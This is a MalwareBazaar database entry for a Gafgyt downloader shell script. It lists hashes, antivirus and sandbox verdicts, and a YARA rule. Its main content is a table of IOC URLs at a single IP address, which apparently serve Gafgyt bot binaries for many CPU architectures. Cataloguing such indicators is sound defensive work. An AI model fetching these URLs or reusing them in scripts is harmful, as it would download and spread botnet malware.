MalwareBazaar Database

You are currently viewing the MalwareBazaar entry for SHA256 be965900a62e5c053caabcd22800a497bb2fe9688b95643f76b21a730f9e2eba. While MalwareBazaar tries to identify whether the sample provided is malicious or not, there is no guarantee that a sample in MalwareBazaar is malicious.

Database Entry


Gafgyt


Vendor detections: 7


Intelligence 7 IOCs YARA 1 File information Comments
Download sample Add tag Delete this sample Report a False Positive

SHA256 hash: be965900a62e5c053caabcd22800a497bb2fe9688b95643f76b21a730f9e2eba
SHA3-384 hash: 5de9d63d98cb77cc0fdbca3bda8138c5be65cd2d40f2fe2a6efe7ff5d28d61354ca7727fc3d3cc6624d669d65aef5358
SHA1 hash: 773b7d99dca4d18aa489082f3e1c2f8b3504844a
MD5 hash: e2400d1448be0b8bdda1d1f9f5306027
humanhash: nuts-twenty-friend-oscar
File name:bins.sh
Download: download sample
Signature Gafgyt
Create hunting rule
File size:2'347 bytes
First seen:2025-05-04 04:02:16 UTC
Last seen:Never
File type: sh
MIME type:text/plain
ssdeep 48:1wb0hkwoJdeHfEcVa3cJ/UGfwUNuXF83gMpSRH0oX:1sAfEIoc/UgAFygMpSRH06
TLSH T14641AF8570A648B4AEA0B9DF72648CC036D2C0967CC6DFF51DF9B4D401ADE9878217C7
Magika txt
Reporter abuse_ch
Tags:sh
URLMalware sample (SHA256 hash)SignatureTags
http://156.253.227.62/assailant.mipse1ea9d3dfc9f9c43f0671986c69e105b4f96d87e561d14955ab14a3052701567 Gafgytelf gafgyt ua-wget
http://156.253.227.62/assailant.mpsl7d2077bc6597d4b84b9c605a244bfb6eca988e4a72284c74fd56b0bc47bdaa93 Gafgytelf gafgyt ua-wget
http://156.253.227.62/assailant.sh45452b60c50e6db75dc8eceab115a08cfbad194008039d95159d63fef255889b8 Gafgytelf gafgyt ua-wget
http://156.253.227.62/assailant.x86008ab077a2c0dbb8170f10309c8a22c08a11d6bba7a7a2a0f00273020ea556dc Gafgytelf gafgyt ua-wget
http://156.253.227.62/assailant.arm6a2ef1c6d36abc7ffa2f8b7a13caec7d8d1c048d3b39bc2fa5b7e714386260ba4 Gafgytelf gafgyt ua-wget
http://156.253.227.62/assailant.i686bc4189687af690b4c0a52c76abda81cbb0f1da9ccdea337480a51bd0cf16c5fd Gafgytelf gafgyt ua-wget
http://156.253.227.62/assailant.ppc36177aaa05f44f26801e60c6cf92c5de1061702eb7f9dda467c4d28f0733dca8 Gafgytelf gafgyt ua-wget
http://156.253.227.62/assailant.i586f904aa6c4f4f1d025499c8df8666f2cb6997772224b923d846e32467ffb9e020 Gafgytelf gafgyt ua-wget
http://156.253.227.62/assailant.m68kb0faa31f7db6a9984be362bbc2a30aa38fa1e062b2ea89b58e49e8f774f6f0c0 Gafgytelf gafgyt ua-wget
http://156.253.227.62/assailant.sparc778d00bf06a80b52d0380c812318e7fa62d1d2c297f67c2a58b5078516000f4b Gafgytelf gafgyt ua-wget
http://156.253.227.62/assailant.arm4140bc7e195968b71094ec30ab2f92d8f4b7ae9cc0430ecb4f4b1bbbb0f69dab4 Gafgytelf gafgyt ua-wget
http://156.253.227.62/assailant.arm597153806364a450aa25fe57f19085a1390fba01f542b8ed9cad2602abdd2530f Gafgytelf gafgyt ua-wget
http://156.253.227.62/assailant.arm7c67e7a9cb60eb441c9fd86a3c23ab6cd8aaaa2cf434648e694cc55db1c28ce60 Gafgytelf gafgyt ua-wget
http://156.253.227.62/assailant.ppc440fpn/an/aelf ua-wget

Intelligence

File Origin
# of uploads :
1
# of downloads :
91
Origin country :
DE DE
Vendor Threat Intelligence
Detection(s):
Sanesecurity.Malware.30790.LX.BOT.UNOFFICIAL
Create hunting rule

SecuriteInfo.com.Linux.Downloader-29.UNOFFICIAL
Create hunting rule

SecuriteInfo.com.Linux.Downloader-6.UNOFFICIAL
Create hunting rule

Verdict:
Malicious
Score:
93.3%
Link:
https://cyber-fortress.com/docs/result/index.php?id=6816e926432e243ac3e3b786linux22vpnfull_triage
Tags:
downloader hype sage
Verdict:
Malicious
Threat level:
  10/10
Confidence:
100%
Tags:
lolbin remote
Link:
https://www.filescan.io/uploads/6816e701c7418694c8a4fbe5/reports/232a57a1-e301-4ab3-8ab0-82f7c1b974cd/overview
Score:
100%
Verdict:
Malware
File Type:
SCRIPT
Link:
https://malprob.io/report/be965900a62e5c053caabcd22800a497bb2fe9688b95643f76b21a730f9e2eba
Detection:
n/a
Link:
https://mwdb.cert.pl/sample/be965900a62e5c053caabcd22800a497bb2fe9688b95643f76b21a730f9e2eba/
Threat name:
Linux.Downloader.Medusa
Create hunting rule
Status:
Malicious
First seen:
2025-05-04 04:03:15 UTC
File Type:
Text (Shell)
AV detection:
17 of 24 (70.83%)
Threat level:
  3/5
Detection(s):
Suspicious file
Link:
https://check.spamhaus.org/check/?searchterm=x2lfsafgfzoakpfkxtjcqafes65s72lirokwip3wwinhgd46f25a._file
Result
Malware family:
n/a
Score:
  3/10
Tags:
n/a
Link:
https://tria.ge/reports/250504-emc9xscm8x/
Behaviour
Modifies registry class
Suspicious use of SetWindowsHookEx
Enumerates physical storage devices
Please note that we are no longer able to provide a coverage score for Virus Total.
Threat name:
Malicious File
Score:
1.00
Link:
https://yomi.yoroi.company/submissions/be965900a62e5c053caabcd22800a497bb2fe9688b95643f76b21a730f9e2eba

YARA Signatures

MalwareBazaar uses YARA rules from several public and non-public repositories, such as YARAhub and Malpedia. Those are being matched against malware samples uploaded to MalwareBazaar as well as against any suspicious process dumps they may create. Please note that only results from TLP:CLEAR rules are being displayed.

Rule name:ach_202412_suspect_bash_script
Create hunting rule
Author:abuse.ch
Description:Detects suspicious Linux bash scripts

File information

The table below shows additional information about this malware sample such as delivery method and external references.

Web download

Gafgyt

sh be965900a62e5c053caabcd22800a497bb2fe9688b95643f76b21a730f9e2eba

(this sample)

Gafgyt

elf e1ea9d3dfc9f9c43f0671986c69e105b4f96d87e561d14955ab14a3052701567

  
URLhaus
https://urlhaus.abuse.ch/url/3514104/
  
Delivery method
Distributed via web download
  
Dropping
MD5 5b277b4934bc6e228f53f371553cd37c
  
Dropping
SHA256 e1ea9d3dfc9f9c43f0671986c69e105b4f96d87e561d14955ab14a3052701567

Comments